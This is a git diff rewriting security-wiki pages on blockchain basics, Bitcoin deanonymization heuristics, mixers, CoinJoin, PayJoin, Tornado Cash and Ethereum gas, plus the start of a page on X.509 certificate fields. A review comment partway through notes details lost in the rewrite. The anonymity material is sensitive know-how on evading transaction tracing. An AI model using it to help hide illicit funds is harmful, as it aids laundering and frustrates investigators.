diff --git a/blockchain/blockchain-and-crypto-currencies/README.md b/blockchain/blockchain-and-crypto-currencies/README.md index 73f686d73..988b051e5 100644 --- a/blockchain/blockchain-and-crypto-currencies/README.md +++ b/blockchain/blockchain-and-crypto-currencies/README.md 
@@ -15,275 +15,179 @@ Other ways to support HackTricks: -# Basic Terminology +## Basic Concepts -* **Smart contract**: Smart contracts are simply **programs stored on a blockchain that run when predetermined conditions are met**. They typically are used to automate the **execution** of an **agreement** so that all participants can be immediately certain of the outcome, without any intermediary’s involvement or time loss. (From [here](https://www.ibm.com/topics/smart-contracts)). - * Basically, a smart contract is a **piece of code** that is going to be executed when people access and accept the contract. Smart contracts **run in blockchains** (so the results are stored inmutable) and can be read by the people before accepting them. -* **dApps**: **Decentralised applications** are implemented on top of **smart** **contracts**. They usually have a front-end where the user can interact with the app, the **back-end** is public (so it can be audited) and is implemented as a **smart contract**. Sometimes the use of a database is needed, Ethereum blockchain allocates certain storage to each account. -* **Tokens & coins**: A **coin** is a cryptocurrency that act as **digital** **money** and a **token** is something that **represents** some **value** but it's not a coin. - * **Utility Tokens**: These tokens allow the user to **access certain service later** (it's something that have some value in a specific environment). - * **Security Tokens**: These represents the **ownership** or some asset. -* **DeFi**: **Decentralized Finance**. -* **DEX: Decentralized Exchange Platforms**. -* **DAOs**: **Decentralized Autonomous Organizations**. +- **Smart Contracts** are defined as programs that execute on a blockchain when certain conditions are met, automating agreement executions without intermediaries. +- **Decentralized Applications (dApps)** build upon smart contracts, featuring a user-friendly front-end and a transparent, auditable back-end. 
+- **Tokens & Coins** differentiate where coins serve as digital money, while tokens represent value or ownership in specific contexts. + - **Utility Tokens** grant access to services, and **Security Tokens** signify asset ownership. +- **DeFi** stands for Decentralized Finance, offering financial services without central authorities. +- **DEX** and **DAOs** refer to Decentralized Exchange Platforms and Decentralized Autonomous Organizations, respectively. -# Consensus Mechanisms +## Consensus Mechanisms -For a blockchain transaction to be recognized, it must be **appended** to the **blockchain**. Validators (miners) carry out this appending; in most protocols, they **receive a reward** for doing so. For the blockchain to remain secure, it must have a mechanism to **prevent a malicious user or group from taking over a majority of validation**. +Consensus mechanisms ensure secure and agreed transaction validations on the blockchain: +- **Proof of Work (PoW)** relies on computational power for transaction verification. +- **Proof of Stake (PoS)** demands validators to hold a certain amount of tokens, reducing energy consumption compared to PoW. -Proof of work, another commonly used consensus mechanism, uses a validation of computational prowess to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network. +## Bitcoin Essentials -## Proof Of Work (PoW) +### Transactions -This uses a **validation of computational prowess** to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network.\ -The **miners** will **select several transactions** and then start **computing the Proof Of Work**. The **miner with the greatest computation resources** is more probably to **finish** **earlier** the Proof of Work and get the fees of all the transactions. +Bitcoin transactions involve transferring funds between addresses. 
Transactions are validated through digital signatures, ensuring only the owner of the private key can initiate transfers. -## Proof Of Stake (PoS) +#### Key Components: -PoS accomplishes this by **requiring that validators have some quantity of blockchain tokens**, requiring **potential attackers to acquire a large fraction of the tokens** on the blockchain to mount an attack.\ -In this kind of consensus, the more tokens a miner has, the more probably it will be that the miner will be asked to create the next block.\ -Compared with PoW, this greatly **reduced the energy consumption** the miners are expending. +- **Multisignature Transactions** require multiple signatures to authorize a transaction. +- Transactions consist of **inputs** (source of funds), **outputs** (destination), **fees** (paid to miners), and **scripts** (transaction rules). -# Bitcoin +### Lightning Network -## Transactions +Aims to enhance Bitcoin's scalability by allowing multiple transactions within a channel, only broadcasting the final state to the blockchain. -A simple **transaction** is a **movement of money** from an address to another one.\ -An **address** in bitcoin is the hash of the **public** **key**, therefore, someone in order to make a transaction from an address he needs to know the private key associated to that public key (the address).\ -Then, when a **transaction** is performed, it's **signed** with the private key of the address to show that the transaction is **legit**. +## Bitcoin Privacy Concerns -The first part of producing a digital signature in Bitcoin can be represented mathematically in the following way:\ -_**Sig**_ = _**Fsig**_(_**Fhash**_(_**m**_),_**dA**_) +Privacy attacks, such as **Common Input Ownership** and **UTXO Change Address Detection**, exploit transaction patterns. Strategies like **Mixers** and **CoinJoin** improve anonymity by obscuring transaction links between users. 
-Where: +## Acquiring Bitcoins Anonymously -* \_d\_A is the signing **private key** -* _m_ is the **transaction** -* Fhash is the hashing function -* Fsig is the signing algorithm -* Sig is the resulting signature +Methods include cash trades, mining, and using mixers. **CoinJoin** mixes multiple transactions to complicate traceability, while **PayJoin** disguises CoinJoins as regular transactions for heightened privacy. -The signing function (Fsig) produces a signature (Sig) that comprises of two values: R and S: -* Sig = (R, S) +# Bitcoin Privacy Atacks -Once R and S have been calculated, they are serialized into a byte stream that is encoded using an international standard encoding scheme that is known as the Distinguished Encoding Rules (or DER). In order to verify that the signature is valid, a signature verification algorithm is used. Verification of a digital signature requires the following: +# Summary of Bitcoin Privacy Attacks -* Signature (R and S) -* Transaction hash -* The public key that corresponds to the private key that was used to create the signature +In the world of Bitcoin, the privacy of transactions and the anonymity of users are often subjects of concern. Here's a simplified overview of several common methods through which attackers can compromise Bitcoin privacy. -Verification of a signature effectively means that only the owner of the private key (that generated the public key) could have produced the signature on the transaction. The signature verification algorithm will return ‘TRUE’ if the signature is indeed valid. +## **Common Input Ownership Assumption** -### Multisignature Transactions +It is generally rare for inputs from different users to be combined in a single transaction due to the complexity involved. Thus, **two input addresses in the same transaction are often assumed to belong to the same owner**. -A multi-signature **address** is an address that is associated with more than one ECDSA private key. 
The simplest type is an m-of-n address - it is associated with n private keys, and sending bitcoins from this address requires signatures from at least m keys. A multi-signature **transaction** is one that sends funds from a multi-signature address. +## **UTXO Change Address Detection** -### Transactions Fields +A UTXO, or **Unspent Transaction Output**, must be entirely spent in a transaction. If only a part of it is sent to another address, the remainder goes to a new change address. Observers can assume this new address belongs to the sender, compromising privacy. -Each bitcoin transaction has several fields: +### Example +To mitigate this, mixing services or using multiple addresses can help obscure ownership. -* **Inputs**: The amount and address **from** where **bitcoins** are **being** transferred -* **Outputs**: The address and amounts that each **transferred** to **each** **output** -* **Fee:** The amount of **money** that is **payed** to the **miner** of the transaction -* **Script\_sig**: Script signature of the transaction -* **Script\_type**: Type of transaction +## **Social Networks & Forums Exposure** -There are **2 main types** of transactions: +Users sometimes share their Bitcoin addresses online, making it **easy to link the address to its owner**. -* **P2PKH: "Pay To Public Key Hash"**: This is how transactions are made. You are requiring the **sender** to supply a valid **signature** (from the private key) and **public** **key**. The transaction output script will use the signature and public key and through some cryptographic functions will check **if it matches** with the public key hash, if it does, then the **funds** will be **spendable**. This method conceals your public key in the form of a hash for extra security. 
-* **P2SH: "Pay To Script Hash":** The outputs of a transaction are just **scripts** (this means the person how want this money send a script) that, if are **executed with specific parameters, will result in a boolean of `true` or `false`**. If a miner runs the output script with the supplied parameters and results in `true`, the **money will be sent to your desired output**. `P2SH` is used for **multi-signature** wallets making the output scripts **logic that checks for multiple signatures before accepting the transaction**. `P2SH` can also be used to allow anyone, or no one, to spend the funds. If the output script of a P2SH transaction is just `1` for true, then attempting to spend the output without supplying parameters will just result in `1` making the money spendable by anyone who tries. This also applies to scripts that return `0`, making the output spendable by no one. +## **Transaction Graph Analysis** -## Lightning Network +Transactions can be visualized as graphs, revealing potential connections between users based on the flow of funds. -This protocol helps to **perform several transactions to a channe**l and **just** **sent** the **final** **state** to the blockchain to save it.\ -This **improves** bitcoin blockchain **speed** (it just on allow 7 payments per second) and it allows to create **transactions more difficult to trace** as the channel is created via nodes of the bitcoin blockchain: +## **Unnecessary Input Heuristic (Optimal Change Heuristic)** -![](<../../.gitbook/assets/image (611).png>) +This heuristic is based on analyzing transactions with multiple inputs and outputs to guess which output is the change returning to the sender. 
-Normal use of the Lightning Network consists of **opening a payment channel** by committing a funding transaction to the relevant base blockchain (layer 1), followed by making **any number** of Lightning Network **transactions** that update the tentative distribution of the channel's funds **without broadcasting those to the blockchain**, optionally followed by closing the payment channel by **broadcasting** the **final** **version** of the settlement transaction to distribute the channel's funds. +### Example -Note that any of the both members of the channel can stop and send the final state of the channel to the blockchain at any time. - -# Bitcoin Privacy Attacks - -## Common Input - -Theoretically the inputs of one transaction can belong to different users, but in reality that is unusual as it requires extra steps. Therefore, very often it can be assumed that **2 input addresses in the same transaction belongs to the same owner**. - -## UTXO Change Address Detection - -**UTXO** means **Unspent Transaction Outputs** (UTXOs). In a transaction that uses the output from a previous transaction as an input, the **whole output need to be spent** (to avoid double-spend attacks). Therefore, if the intention was to **send** just **part** of the money from that output to an address and **keep** the **other** **part**, **2 different outputs** will appear: the **intended** one and a **random new change address** where the rest of the money will be saved. - -Then, a watcher can make the assumption that **the new change address generated belong to the owner of the UTXO**. - -## Social Networks & Forums - -Some people gives data about theirs bitcoin addresses in different webs on Internet. **This make pretty easy to identify the owner of an address**. - -## Transaction Graphs - -By representing the transactions in graphs, i**t's possible to know with certain probability to where the money of an account were**. 
Therefore, it's possible to know something about **users** that are **related** in the blockchain. - -## **Unnecessary input heuristic** - -Also called the "optimal change heuristic". Consider this bitcoin transaction. It has two inputs worth 2 BTC and 3 BTC and two outputs worth 4 BTC and 1 BTC. - -``` +```bash 2 btc --> 4 btc 3 btc 1 btc ``` -Assuming one of the outputs is change and the other output is the payment. There are two interpretations: the payment output is either the 4 BTC output or the 1 BTC output. But if the 1 BTC output is the payment amount then the 3 BTC input is unnecessary, as the wallet could have spent only the 2 BTC input and paid lower miner fees for doing so. This is an indication that the real payment output is 4 BTC and that 1 BTC is the change output. +If adding more inputs makes the change output larger than any single input, it can confuse the heuristic. -This is an issue for transactions which have more than one input. One way to fix this leak is to add more inputs until the change output is higher than any input, for example: +## **Forced Address Reuse** -``` -2 btc --> 4 btc -3 btc 6 btc -5 btc -``` +Attackers may send small amounts to previously used addresses, hoping the recipient combines these with other inputs in future transactions, thereby linking addresses together. -## Forced address reuse +### Correct Wallet Behavior +Wallets should avoid using coins received on already used, empty addresses to prevent this privacy leak. -**Forced address reuse** or **incentivized address reuse** is when an adversary pays an (often small) amount of bitcoin to addresses that have already been used on the block chain. The adversary hopes that users or their wallet software **will use the payments as inputs to a larger transaction which will reveal other addresses via the the common-input-ownership** heuristic. These payments can be understood as a way to coerce the address owner into unintentional address reuse. 
+## **Other Blockchain Analysis Techniques** -This attack is sometimes incorrectly called a **dust attack**. +- **Exact Payment Amounts:** Transactions without change are likely between two addresses owned by the same user. +- **Round Numbers:** A round number in a transaction suggests it's a payment, with the non-round output likely being the change. +- **Wallet Fingerprinting:** Different wallets have unique transaction creation patterns, allowing analysts to identify the software used and potentially the change address. +- **Amount & Timing Correlations:** Disclosing transaction times or amounts can make transactions traceable. -The correct behaviour by wallets is to not spend coins that have landed on an already-used empty addresses. +## **Traffic Analysis** -## Other Blockchain Analysis +By monitoring network traffic, attackers can potentially link transactions or blocks to IP addresses, compromising user privacy. This is especially true if an entity operates many Bitcoin nodes, enhancing their ability to monitor transactions. -* **Exact Payment Amounts**: In order to avoid transactions with a change, the payment needs to be equal to the UTXO (which is highly unexpected). Therefore, a **transaction with no change address are probably transfer between 2 addresses of the same user**. -* **Round Numbers**: In a transaction, if one of the outputs is a "**round number**", it's highly probable that this is a **payment to a human that put that** "round number" **price**, so the other part must be the leftover. -* **Wallet fingerprinting:** A careful analyst sometimes deduce which software created a certain transaction, because the many **different wallet softwares don't always create transactions in exactly the same way**. Wallet fingerprinting can be used to detect change outputs because a change output is the one spent with the same wallet fingerprint. 
-* **Amount & Timing correlations**: If the person that performed the transaction **discloses** the **time** and/or **amount** of the transaction, it can be easily **discoverable**. +## More +For a comprehensive list of privacy attacks and defenses, visit [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). -## Traffic analysis -Some organisation **sniffing your traffic** can see you communicating in the bitcoin network.\ -If the adversary sees a transaction or block **coming out of your node which did not previously enter**, then it can know with near-certainty that **the transaction was made by you or the block was mined by you**. As internet connections are involved, the adversary will be able to **link the IP address with the discovered bitcoin information**. +# Anonymous Bitcoin Transactions -An attacker that isn't able to sniff all the Internet traffic but that has **a lot of Bitcoin nodes** in order to stay **closer** to the s**o**urces could be able to know the IP address that are announcing transactions or blocks.\ -Also, some wallets periodically rebroadcast their unconfirmed transactions so that they are more likely to propagate widely through the network and be mined. +## Ways to Get Bitcoins Anonymously -## Other attacks to find info about the owner of addresses +- **Cash Transactions**: Acquiring bitcoin through cash. +- **Cash Alternatives**: Purchasing gift cards and exchanging them online for bitcoin. +- **Mining**: The most private method to earn bitcoins is through mining, especially when done alone because mining pools may know the miner's IP address. [Mining Pools Information](https://en.bitcoin.it/wiki/Pooled_mining) +- **Theft**: Theoretically, stealing bitcoin could be another method to acquire it anonymously, although it's illegal and not recommended. 
-For more attacks read [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy) +## Mixing Services -# Anonymous Bitcoins - -## Obtaining Bitcoins Anonymously - -* **Cash trades:** Buy bitcoin using cash. -* **Cash substitute:** Buy gift cards or similar and exchange them for bitcoin online. -* **Mining:** Mining is the most anonymous way to obtain bitcoin. This applies to solo-mining as [mining pools](https://en.bitcoin.it/wiki/Pooled\_mining) generally know the hasher's IP address. -* **Stealing:** In theory another way of obtaining anonymous bitcoin is to steal them. - -## Mixers - -A user would **send bitcoins to a mixing service** and the service would **send different bitcoins back to the user**, minus a fee. In theory an adversary observing the blockchain would be **unable to link** the incoming and outgoing transactions. - -However, the user needs to trust the mixing service to return the bitcoin and also to not be saving logs about the relations between the money received and sent.\ -Some other services can be also used as mixers, like Bitcoin casinos where you can send bitcoins and retrieve them later. +By using a mixing service, a user can **send bitcoins** and receive **different bitcoins in return**, which makes tracing the original owner difficult. Yet, this requires trust in the service not to keep logs and to actually return the bitcoins. Alternative mixing options include Bitcoin casinos. ## CoinJoin -**CoinJoin** will **mix several transactions of different users into just one** in order to make more **difficult** for an observer to find out **which input is related to which output**.\ -This offers a new level of privacy, however, **some** **transactions** where some input and output amounts are correlated or are very different from the rest of the inputs and outputs **can still be correlated** by the external observer. 
+**CoinJoin** merges multiple transactions from different users into one, complicating the process for anyone trying to match inputs with outputs. Despite its effectiveness, transactions with unique input and output sizes can still potentially be traced. -Examples of (likely) CoinJoin transactions IDs on bitcoin's blockchain are `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. +Example transactions that may have used CoinJoin include `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. -[**https://coinjoin.io/en**](https://coinjoin.io/en)\ -**Similar to coinjoin but better and for ethereum you have** [**Tornado Cash**](https://tornado.cash) **(the money is given from miners, so it jus appear in your waller).** +For more information, visit [CoinJoin](https://coinjoin.io/en). For a similar service on Ethereum, check out [Tornado Cash](https://tornado.cash), which anonymizes transactions with funds from miners. ## PayJoin -The type of CoinJoin discussed in the previous section can be easily identified as such by checking for the multiple outputs with the same value. +A variant of CoinJoin, **PayJoin** (or P2EP), disguises the transaction among two parties (e.g., a customer and a merchant) as a regular transaction, without the distinctive equal outputs characteristic of CoinJoin. This makes it extremely hard to detect and could invalidate the common-input-ownership heuristic used by transaction surveillance entities. -PayJoin (also called pay-to-end-point or P2EP) is a special type of CoinJoin between two parties where one party pays the other. The transaction then **doesn't have the distinctive multiple outputs** with the same value, and so is not obviously visible as an equal-output CoinJoin. 
Consider this transaction: - -``` +```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` -It could be interpreted as a simple transaction paying to somewhere with leftover change (ignore for now the question of which output is payment and which is change). Another way to interpret this transaction is that the 2 BTC input is owned by a merchant and 5 BTC is owned by their customer, and that this transaction involves the customer paying 1 BTC to the merchant. There is no way to tell which of these two interpretations is correct. The result is a coinjoin transaction that breaks the common-input-ownership heuristic and improves privacy, but is also **undetectable and indistinguishable from any regular bitcoin transaction**. +Transactions like the above could be PayJoin, enhancing privacy while remaining indistinguishable from standard bitcoin transactions. -If PayJoin transactions became even moderately used then it would make the **common-input-ownership heuristic be completely flawed in practice**. As they are undetectable we wouldn't even know whether they are being used today. As transaction surveillance companies mostly depend on that heuristic, as of 2019 there is great excitement about the PayJoin idea. +**The utilization of PayJoin could significantly disrupt traditional surveillance methods**, making it a promising development in the pursuit of transactional privacy. -# Bitcoin Privacy Good Practices -## Wallet Synchronization +# Best Practices for Privacy in Cryptocurrencies -Bitcoin wallets must somehow obtain information about their balance and history. As of late-2018 the most practical and private existing solutions are to use a **full node wallet** (which is maximally private) and **client-side block filtering** (which is very good). +## **Wallet Synchronization Techniques** -* **Full node:** Full nodes download the entire blockchain which contains every on-chain [transaction](https://en.bitcoin.it/wiki/Transaction) that has ever happened in bitcoin. 
So an adversary watching the user's internet connection will not be able to learn which transactions or addresses the user is interested in. -* **Client-side block filtering:** Client-side block filtering works by having **filters** created that contains all the **addresses** for every transaction in a block. The filters can test whether an **element is in the set**; false positives are possible but not false negatives. A lightweight wallet would **download** all the filters for every **block** in the **blockchain** and check for matches with its **own** **addresses**. Blocks which contain matches would be downloaded in full from the peer-to-peer network, and those blocks would be used to obtain the wallet's history and current balance. +To maintain privacy and security, synchronizing wallets with the blockchain is crucial. Two methods stand out: -## Tor +- **Full node**: By downloading the entire blockchain, a full node ensures maximum privacy. All transactions ever made are stored locally, making it impossible for adversaries to identify which transactions or addresses the user is interested in. +- **Client-side block filtering**: This method involves creating filters for every block in the blockchain, allowing wallets to identify relevant transactions without exposing specific interests to network observers. Lightweight wallets download these filters, only fetching full blocks when a match with the user's addresses is found. -Bitcoin network uses a peer-to-peer network, which means that other peers can learn your IP address. This is why it's recommend to **connect through Tor every time you want to interact with the bitcoin network**. +## **Utilizing Tor for Anonymity** -## Avoiding address reuse +Given that Bitcoin operates on a peer-to-peer network, using Tor is recommended to mask your IP address, enhancing privacy when interacting with the network. 
-**Addresses being used more than once is very damaging to privacy because that links together more blockchain transactions with proof that they were created by the same entity**. The most private and secure way to use bitcoin is to send a brand **new address to each person who pays you**. After the received coins have been spent the address should never be used again. Also, a brand new bitcoin address should be demanded when sending bitcoin. All good bitcoin wallets have a user interface which discourages address reuse. +## **Preventing Address Reuse** -## Multiple transactions +To safeguard privacy, it's vital to use a new address for every transaction. Reusing addresses can compromise privacy by linking transactions to the same entity. Modern wallets discourage address reuse through their design. -**Paying** someone with **more than one on-chain transaction** can greatly reduce the power of amount-based privacy attacks such as amount correlation and round numbers. For example, if the user wants to pay 5 BTC to somebody and they don't want the 5 BTC value to be easily searched for, then they can send two transactions for the value of 2 BTC and 3 BTC which together add up to 5 BTC. +## **Strategies for Transaction Privacy** -## Change avoidance +- **Multiple transactions**: Splitting a payment into several transactions can obscure the transaction amount, thwarting privacy attacks. +- **Change avoidance**: Opting for transactions that don't require change outputs enhances privacy by disrupting change detection methods. +- **Multiple change outputs**: If avoiding change isn't feasible, generating multiple change outputs can still improve privacy. -Change avoidance is where transaction inputs and outputs are carefully chosen to not require a change output at all. **Not having a change output is excellent for privacy**, as it breaks change detection heuristics. 
+# **Monero: A Beacon of Anonymity** -## Multiple change outputs +Monero addresses the need for absolute anonymity in digital transactions, setting a high standard for privacy. -If change avoidance is not an option then **creating more than one change output can improve privacy**. This also breaks change detection heuristics which usually assume there is only a single change output. As this method uses more block space than usual, change avoidance is preferable. +# **Ethereum: Gas and Transactions** -# Monero +## **Understanding Gas** -When Monero was developed, the gaping need for **complete anonymity** was what it sought to resolve, and to a large extent, it has filled that void. +Gas measures the computational effort needed to execute operations on Ethereum, priced in **gwei**. For example, a transaction costing 2,310,000 gwei (or 0.00231 ETH) involves a gas limit and a base fee, with a tip to incentivize miners. Users can set a max fee to ensure they don't overpay, with the excess refunded. -# Ethereum +## **Executing Transactions** -## Gas +Transactions in Ethereum involve a sender and a recipient, which can be either user or smart contract addresses. They require a fee and must be mined. Essential information in a transaction includes the recipient, sender's signature, value, optional data, gas limit, and fees. Notably, the sender's address is deduced from the signature, eliminating the need for it in the transaction data. -Gas refers to the unit that measures the **amount** of **computational** **effort** required to execute specific operations on the Ethereum network. Gas refers to the **fee** required to successfully conduct a **transaction** on Ethereum. +These practices and mechanisms are foundational for anyone looking to engage with cryptocurrencies while prioritizing privacy and security. -Gas prices are denoted in **gwei**, which itself is a denomination of ETH - each gwei is equal to **0.000000001 ETH** (10-9 ETH). 
For example, instead of saying that your gas costs 0.000000001 ether, you can say your gas costs 1 gwei. The word 'gwei' itself means 'giga-wei', and it is equal to **1,000,000,000 wei**. Wei itself is the **smallest unit of ETH**. - -To calculate the gas that a transaction is going to cost read this example: - -Let’s say Jordan has to pay Taylor 1 ETH. In the transaction the gas limit is 21,000 units and the base fee is 100 gwei. Jordan includes a tip of 10 gwei. - -Using the formula above we can calculate this as `21,000 * (100 + 10) = 2,310,000 gwei` or 0.00231 ETH. - -When Jordan sends the money, 1.00231 ETH will be deducted from Jordan's account. Taylor will be credited 1.0000 ETH. Miner receives the tip of 0.00021 ETH. Base fee of 0.0021 ETH is burned. - -Additionally, Jordan can also set a max fee (`maxFeePerGas`) for the transaction. The difference between the max fee and the actual fee is refunded to Jordan, i.e. `refund = max fee - (base fee + priority fee)`. Jordan can set a maximum amount to pay for the transaction to execute and not worry about overpaying "beyond" the base fee when the transaction is executed. - -As the base fee is calculated by the network based on demand for block space, this last param: maxFeePerGas helps to control the maximum fee that is going to be payed. - -## Transactions - -Notice that in the **Ethereum** network a transaction is performed between 2 addresses and these can be **user or smart contract addresses**.\ -**Smart Contracts** are stored in the distributed ledger via a **special** **transaction**. - -Transactions, which change the state of the EVM, need to be broadcast to the whole network. Any node can broadcast a request for a transaction to be executed on the EVM; after this happens, a **miner** will **execute** the **transaction** and propagate the resulting state change to the rest of the network.\ -Transactions require a **fee** and must be mined to become valid. 
- -A submitted transaction includes the following information: - -* `recipient` – the receiving address (if an externally-owned account, the transaction will transfer value. If a contract account, the transaction will execute the contract code) -* `signature` – the identifier of the sender. This is generated when the sender's private key signs the transaction and confirms the sender has authorised this transaction -* `value` – amount of ETH to transfer from sender to recipient (in WEI, a denomination of ETH) -* `data` – optional field to include arbitrary data -* `gasLimit` – the maximum amount of gas units that can be consumed by the transaction. Units of gas represent computational steps -* `maxPriorityFeePerGas` - the maximum amount of gas to be included as a tip to the miner -* `maxFeePerGas` - the maximum amount of gas willing to be paid for the transaction (inclusive of `baseFeePerGas` and `maxPriorityFeePerGas`) - -Note that there isn't any field for the origin address, this is because this can be extrapolated from the signature. ## References diff --git a/cryptography/certificates.md b/cryptography/certificates.md index adbd695d2..ee0644afb 100644 --- a/cryptography/certificates.md +++ b/cryptography/certificates.md 
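Review bot: the rewritten "Understanding Gas" paragraph in this hunk drops the numbers that made the example checkable: the removed lines gave the gas limit (21,000 units), the base fee (100 gwei) and the tip (10 gwei) and showed `21,000 * (100 + 10) = 2,310,000 gwei`, while the new line only says a transaction "costing 2,310,000 gwei (or 0.00231 ETH) involves a gas limit and a base fee" without stating either value. Keep the three inputs and the multiplication, and keep the split the old text spelled out (the tip goes to the miner, the base fee is burned), since "a tip to incentivize miners" on its own suggests the whole fee is paid to the miner. The same hunk also loses the definition of gwei (10^-9 ETH, 1,000,000,000 wei), the refund rule `refund = max fee - (base fee + priority fee)`, and the list of transaction fields (`recipient`, `signature`, `value`, `data`, `gasLimit`, `maxPriorityFeePerGas`, `maxFeePerGas`); the field names are exactly what a reader needs when inspecting a raw transaction, so that list is worth restoring even if the prose around it is shortened. Heading levels are inconsistent after this change: the hunk demotes `# Basic Terminology` to `## Basic Concepts` but introduces `# **Monero: A Beacon of Anonymity**` and `# **Ethereum: Gas and Transactions**` at level one, so the new sections outrank the section they belong to; use `##` for those and `###` for "Understanding Gas" and "Executing Transactions". The removed "Multiple change outputs" paragraph (more than one change output breaks the single-change heuristic at the cost of block space, so change avoidance is still preferable) has no counterpart in the added lines and should be restored. The closing sentence "These practices and mechanisms are foundational for anyone..." carries no technical content and can be dropped.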
@@ -24,180 +24,171 @@ Get Access Today: ## What is a Certificate -In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner (called the subject), and the digital signature of an entity that has verified the certificate's contents (called the issuer). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject. +A **public key certificate** is a digital ID used in cryptography to prove someone owns a public key. It includes the key's details, the owner's identity (the subject), and a digital signature from a trusted authority (the issuer). If the software trusts the issuer and the signature is valid, secure communication with the key's owner is possible. -In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key\_infrastructure) (PKI) scheme, the certificate issuer is a [certificate authority](https://en.wikipedia.org/wiki/Certificate\_authority) (CA), usually a company that charges customers to issue certificates for them. By contrast, in a [web of trust](https://en.wikipedia.org/wiki/Web\_of\_trust) scheme, individuals sign each other's keys directly, in a format that performs a similar function to a public key certificate. - -The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure (X.509)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280. 
+Certificates are mostly issued by [certificate authorities](https://en.wikipedia.org/wiki/Certificate_authority) (CAs) in a [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) setup. Another method is the [web of trust](https://en.wikipedia.org/wiki/Web_of_trust), where users directly verify each other’s keys. The common format for certificates is [X.509](https://en.wikipedia.org/wiki/X.509), which can be adapted for specific needs as outlined in RFC 5280. ## x509 Common Fields -* **Version Number:** Version of x509 format. -* **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information. -* **Subject**: The entity a certificate belongs to: a machine, an individual, or an organization. - * **Common Name**: Domains affected by the certificate. Can be 1 or more and can contain wildcards. - * **Country (C)**: Country - * **Distinguished name (DN)**: The whole subject: `C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net` - * **Locality (L)**: Local place - * **Organization (O)**: Organization name - * **Organizational Unit (OU)**: Division of an organisation (like "Human Resources"). - * **State or Province (ST, S or P)**: List of state or province names -* **Issuer**: The entity that verified the information and signed the certificate. - * **Common Name (CN)**: Name of the certificate authority - * **Country (C)**: Country of the certificate authority - * **Distinguished name (DN)**: Distinguished name of the certificate authority - * **Locality (L)**: Local place where the organisation can be found. - * **Organization (O)**: Organisation name - * **Organizational Unit (OU)**: Division of an organisation (like "Human Resources"). -* **Not Before**: The earliest time and date on which the certificate is valid. 
Usually set to a few hours or days prior to the moment the certificate was issued, to avoid [clock skew](https://en.wikipedia.org/wiki/Clock\_skew#On\_a\_network) problems. -* **Not After**: The time and date past which the certificate is no longer valid. -* **Public Key**: A public key belonging to the certificate subject. (This is one of the main parts as this is what is signed by the CA) - * **Public Key Algorithm**: Algorithm used to generate the public key. Like RSA. - * **Public Key Curve**: The curve used by the elliptic curve public key algorithm (if apply). Like nistp521. - * **Public Key Exponent**: Exponent used to derive the public key (if apply). Like 65537. - * **Public Key Size**: The size of the public key space in bits. Like 2048. - * **Signature Algorithm**: The algorithm used to sign the public key certificate. - * **Signature**: A signature of the certificate body by the issuer's private key. -* **x509v3 extensions** - * **Key Usage**: The valid cryptographic uses of the certificate's public key. Common values include digital signature validation, key encipherment, and certificate signing. - * In a Web certificate this will appear as a _X509v3 extension_ and will have the value `Digital Signature` - * **Extended Key Usage**: The applications in which the certificate may be used. Common values include TLS server authentication, email protection, and code signing. - * In a Web certificate this will appear as a _X509v3 extension_ and will have the value `TLS Web Server Authentication` - * **Subject Alternative Name:** Allows users to specify additional host **names** for a single SSL **certificate**. The use of the SAN extension is standard practice for SSL certificates, and it's on its way to replacing the use of the common **name**. - * **Basic Constraint:** This extension describes whether the certificate is a CA certificate or an end entity certificate. 
A CA certificate is something that signs certificates of others and a end entity certificate is the certificate used in a web page for example (the last par of the chain). - * **Subject Key Identifier** (SKI): This extension declares a unique **identifier** for the public **key** in the certificate. It is required on all CA certificates. CAs propagate their own SKI to the Issuer **Key Identifier** (AKI) extension on issued certificates. It's the hash of the subject public key. - * **Authority Key Identifier**: It contains a key identifier which is derived from the public key in the issuer certificate. It's the hash of the issuer public key. - * **Authority Information Access** (AIA): This extension contains at most two types of information : - * Information about **how to get the issuer of this certificate** (CA issuer access method) - * Address of the **OCSP responder from where revocation of this certificate** can be checked (OCSP access method). - * **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate. - * **CT Precertificate SCTs**: Logs of Certificate transparency regarding the certificate +### **Common Fields in x509 Certificates** -### Difference between OCSP and CRL Distribution Points +In x509 certificates, several **fields** play critical roles in ensuring the certificate's validity and security. Here's a breakdown of these fields: -**OCSP** (RFC 2560) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**.\ -**CRL** is the **traditional method** of checking certificate validity. 
